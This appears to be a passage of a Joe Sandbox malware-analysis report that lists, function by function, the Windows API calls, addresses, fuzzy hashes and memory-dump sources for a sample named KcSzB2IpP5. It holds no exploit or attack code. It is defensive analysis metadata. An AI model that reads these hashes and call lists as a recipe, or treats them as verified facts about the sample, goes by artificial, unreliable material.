
Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 22b7b76851da30efd81ac7b95fc72190ee201670cf3f432c7a96b97e916970f6
Instruction ID: 5d0a05f555b93454ae584952e7737ce2e231780b90df064d342d33d6de532796
Opcode Fuzzy Hash: 22b7b76851da30efd81ac7b95fc72190ee201670cf3f432c7a96b97e916970f6
Instruction Fuzzy Hash: 7111E47A200201ABDB155F35D844E7B77A5FF45350B10402FE846C73A4EB359811CB69

Function 004F7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004F7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 004F7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004F7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004DB7AD,00000000), ref: 004F7D6B

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 5344f73dc8e132526b1ba164b97aba62b9869b0320acc2446df397815ac8c624
Instruction ID: 78461e90bfecfd0247abdd322ba1005d64eaff2d782b93c9414d095925cf73c2
Opcode Fuzzy Hash: 5344f73dc8e132526b1ba164b97aba62b9869b0320acc2446df397815ac8c624
Instruction Fuzzy Hash: B6119032504619AFCB109F28CC44AB63BA5AF45360B558725F939C72F0D7389961DB58

Function 004F5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 004F56BB
_wcslen.LIBCMT ref: 004F56CD
_wcslen.LIBCMT ref: 004F56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 004F5816

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: c150d746bbf89f16e6edc90cf47567787c140564002acb227ef77d372eb63a6d
Instruction ID: fc2828d4ee9dfc48ba7fbe67b45a2189c4e7416df6af0c9ab0dcb89ba95d789c
Opcode Fuzzy Hash: c150d746bbf89f16e6edc90cf47567787c140564002acb227ef77d372eb63a6d
Instruction Fuzzy Hash: 0911B47160060C96EB20EF618C85AFF77BCAF11764F10442BFB15D6181E7B88984CB6D

Function 004C1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004C1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004C1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004C1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004C1A8A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 530b00df66f3e00ac556a9a807a156ef798260e69af04d8da71b893fab2f7c15
Instruction ID: 4f3a099d284d17acb213c931e1e1264a82df7208234735641bc5d6088a264e39
Opcode Fuzzy Hash: 530b00df66f3e00ac556a9a807a156ef798260e69af04d8da71b893fab2f7c15
Instruction Fuzzy Hash: AA113C3AD01219FFEB10DBA5CD85FADBB78EB04750F200096E600B7290D6716E50DB98

Function 004CE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004CE1FD
MessageBoxW.USER32(?,?,?,?), ref: 004CE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004CE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004CE24D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d6ec0180a60489ccedba33643f307ebb6fe9f15971d79c6dcee4ee9047fd6bc7
Instruction ID: a1406446c6ee2596f9abf5de37f1042eafc13c11ca4815d90e91e6fae9348ba5
Opcode Fuzzy Hash: d6ec0180a60489ccedba33643f307ebb6fe9f15971d79c6dcee4ee9047fd6bc7
Instruction Fuzzy Hash: 95110876904218BBC7019BB99D45FAF7FAC9B45320F00466AF825D3391D3748D1487A8

Function 0048D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0048CFF9,00000000,00000004,00000000), ref: 0048D218
GetLastError.KERNEL32 ref: 0048D224
__dosmaperr.LIBCMT ref: 0048D22B
ResumeThread.KERNEL32(00000000), ref: 0048D249

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 687a5e3dd0ad8351814816464cb9f8010693c9c7ad05864e89bd855ddca0de4a
Instruction ID: e2202b775c6e78a345fbdc04ab83762ad765a1cb2d4a55d1ad2f207fd44f9952
Opcode Fuzzy Hash: 687a5e3dd0ad8351814816464cb9f8010693c9c7ad05864e89bd855ddca0de4a
Instruction Fuzzy Hash: AF012636C061087BCB107BA6DC09BAF7B69EF81334F10066AF924921E0CF758811C7A9

Function 0046600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0046604C
GetStockObject.GDI32(00000011), ref: 00466060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0046606A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5308ad94e79244d281d2125f1cec68453653244a6d4e5cf12ead650d9fbdf009
Instruction ID: 9fbc6803f677376513d62c6a1070e34a5e694b9a2fd088dd66cd34082e4c61bf
Opcode Fuzzy Hash: 5308ad94e79244d281d2125f1cec68453653244a6d4e5cf12ead650d9fbdf009
Instruction Fuzzy Hash: D511A172101509BFEF129FA48C44EEBBF6DEF18354F010126FA0452110D7369C60DFA5

Function 00483B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00483B56

Part of subcall function 00483AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00483AD2
Part of subcall function 00483AA3: ___AdjustPointer.LIBCMT ref: 00483AED

_UnwindNestedFrames.LIBCMT ref: 00483B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00483B7C
CallCatchBlock.LIBVCRUNTIME ref: 00483BA4

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 485dcdd988d93fa55e3231b7d29cf2136911dfd193e242fe07703771e93664dd
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 86016D72100149BBCF127E96CC42DEF3F69EF88B59F04440AFE0856121C33AE961DBA4

Function 00493073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004613C6,00000000,00000000,?,0049301A,004613C6,00000000,00000000,00000000,?,0049328B,00000006,FlsSetValue), ref: 004930A5
GetLastError.KERNEL32(?,0049301A,004613C6,00000000,00000000,00000000,?,0049328B,00000006,FlsSetValue,00502290,FlsSetValue,00000000,00000364,?,00492E46), ref: 004930B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0049301A,004613C6,00000000,00000000,00000000,?,0049328B,00000006,FlsSetValue,00502290,FlsSetValue,00000000), ref: 004930BF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 23453557a400cda3b02600618e1a7464a7d4116babecb8d107e599b5062e4acd
Instruction ID: 2814382409f5d264bb8ba4af60951d416cf11ff9b63f98153c3def53ce629a08
Opcode Fuzzy Hash: 23453557a400cda3b02600618e1a7464a7d4116babecb8d107e599b5062e4acd
Instruction Fuzzy Hash: 4401F732741326ABCF314F789C8896B7F98AF06BA2B110631F915E3244C725DD15C6E8

Function 004C7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004C747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004C7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004C74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004C74CA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 01ee64d47be2e4f10b0b8fe8d9b41107a64b441b74dc364c64b4b42b83f4b981
Instruction ID: 52056d0d29b1f426f7548e4e16d2847750e48271dc38fce61a21f782724efc89
Opcode Fuzzy Hash: 01ee64d47be2e4f10b0b8fe8d9b41107a64b441b74dc364c64b4b42b83f4b981
Instruction Fuzzy Hash: 4211A1B9205314ABE7208F14DE49FA2BFFCEB00B00F10856EE626D6151D774E904DF99

Function 004CB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004CACD3,?,00008000), ref: 004CB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004CACD3,?,00008000), ref: 004CB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004CACD3,?,00008000), ref: 004CB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004CACD3,?,00008000), ref: 004CB126

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1c016b4b613bfa97be353227ac48d1389c4461e6e8596f012fac1c3486d7413e
Instruction ID: e4f642bee5f774e4bca589b6af2289dbb9da5d955efee92929d1a56e19fcc08b
Opcode Fuzzy Hash: 1c016b4b613bfa97be353227ac48d1389c4461e6e8596f012fac1c3486d7413e
Instruction Fuzzy Hash: 68111835C0151CD7CF009FA5DA9ABFEBB78FF09751F14409AD941B2281CB345561CB9A

Function 004C2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004C2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 004C2DD6
GetCurrentThreadId.KERNEL32 ref: 004C2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004C2DE4

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 7470869721435f892f6a4add13d1ce71bba3f3590fd77cb8b6d812c3ef2fd9f4
Instruction ID: d4e8f2b75cd95e940481f0b4e3394f8f984641973ddff380e2a06b0e7fd00738
Opcode Fuzzy Hash: 7470869721435f892f6a4add13d1ce71bba3f3590fd77cb8b6d812c3ef2fd9f4
Instruction Fuzzy Hash: 92E092711452287BE7201B729E4DFFB3E6CEF53BA1F00002AF106D10809AE4C841C6B4

Function 004F8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00479639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00479693
Part of subcall function 00479639: SelectObject.GDI32(?,00000000), ref: 004796A2
Part of subcall function 00479639: BeginPath.GDI32(?), ref: 004796B9
Part of subcall function 00479639: SelectObject.GDI32(?,00000000), ref: 004796E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004F8887
LineTo.GDI32(?,?,?), ref: 004F8894
EndPath.GDI32(?), ref: 004F88A4
StrokePath.GDI32(?), ref: 004F88B2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d075c7bd71c7b8f02d53240276158811b04ef4403de104ea239f7f0503e38ca7
Instruction ID: ccbce1de0efcc36a14a72f8d16999767ec0d41d3138ce830ab9387393ee42770
Opcode Fuzzy Hash: d075c7bd71c7b8f02d53240276158811b04ef4403de104ea239f7f0503e38ca7
Instruction Fuzzy Hash: 12F09A36001258FADB126F94AD09FEA3F19AF06310F008011FA01651E1CB780522DFAD

Function 004798B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004798CC
SetTextColor.GDI32(?,?), ref: 004798D6
SetBkMode.GDI32(?,00000001), ref: 004798E9
GetStockObject.GDI32(00000005), ref: 004798F1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 1496a202c37086e03dce278bcd1095a1e075a0beb14e3f198560cae26ec8b6c6
Instruction ID: 6495f89f07c2068e4ecbfea3874e37955ead288fd857848412a0ec60089513c9
Opcode Fuzzy Hash: 1496a202c37086e03dce278bcd1095a1e075a0beb14e3f198560cae26ec8b6c6
Instruction Fuzzy Hash: 07E06531244244BADB215B74AD49BF93F10EB51336F14822AF6F9581E1C3754660DF24

Function 004C162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 004C1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,004C11D9), ref: 004C163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004C11D9), ref: 004C1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,004C11D9), ref: 004C164F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3db3142cd28b829ff8d9712aa7377cbdbb33cad1d0139284b8779bd9f108c880
Instruction ID: 8f7ab5f79211816d1ecc70b20cb6a732daf92d649ecad4dcc607a1e165eacd0b
Opcode Fuzzy Hash: 3db3142cd28b829ff8d9712aa7377cbdbb33cad1d0139284b8779bd9f108c880
Instruction Fuzzy Hash: 4AE08636601215DBD7601FF09F4DF673B7CEF55791F144829F646C9090DA384455C798

Function 004BD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004BD858
GetDC.USER32(00000000), ref: 004BD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004BD882
ReleaseDC.USER32(?), ref: 004BD8A3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 786c58100b13afa2b683cc8b1b5b35579f1d6a6198c0592733f6afcae09ea94d
Instruction ID: d8fe2e3822bbe41957517b2b22f6f2d0840d1160c8159409849e5311b8dc2292
Opcode Fuzzy Hash: 786c58100b13afa2b683cc8b1b5b35579f1d6a6198c0592733f6afcae09ea94d
Instruction Fuzzy Hash: BDE01270C04208DFDB419FA1D94867DBBB1FB08311F108459E846E7350DB384512DF59

Function 004BD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004BD86C
GetDC.USER32(00000000), ref: 004BD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004BD882
ReleaseDC.USER32(?), ref: 004BD8A3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f78bd8c0c541496033eb7f9206c7e8c85dc9384f19c0c01ec87c8390950da7c2
Instruction ID: 01c1b8ae201d4816c6a7dfa9522187c8a97aa4b30a015d030d31f28ef101c993
Opcode Fuzzy Hash: f78bd8c0c541496033eb7f9206c7e8c85dc9384f19c0c01ec87c8390950da7c2
Instruction Fuzzy Hash: 98E01A70C04208DFDB409FA0D98867DBBB1BB08310B108419E84AE7350CB385912DF48

Function 004D4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00467620: _wcslen.LIBCMT ref: 00467625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 004D4ED4

Strings

*, xrefs: 004D4E10
LPT, xrefs: 004D4DFB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 987e235343e652607a38da2de4406f4050356251d5c7ca57e8da86aef3fcb63b
Instruction ID: 8f1975c4ba61a6c8951d604203a05df23e78c7b97a3cdfc108b404592e1f2d1b
Opcode Fuzzy Hash: 987e235343e652607a38da2de4406f4050356251d5c7ca57e8da86aef3fcb63b
Instruction Fuzzy Hash: 8E915F75A00244AFCB14DF54C494EAABBF1AF84308F14809FE40A9F362D739ED85CB95

Function 0048E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0048E30D

Strings

pow, xrefs: 0048E2E5, 0048E302

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
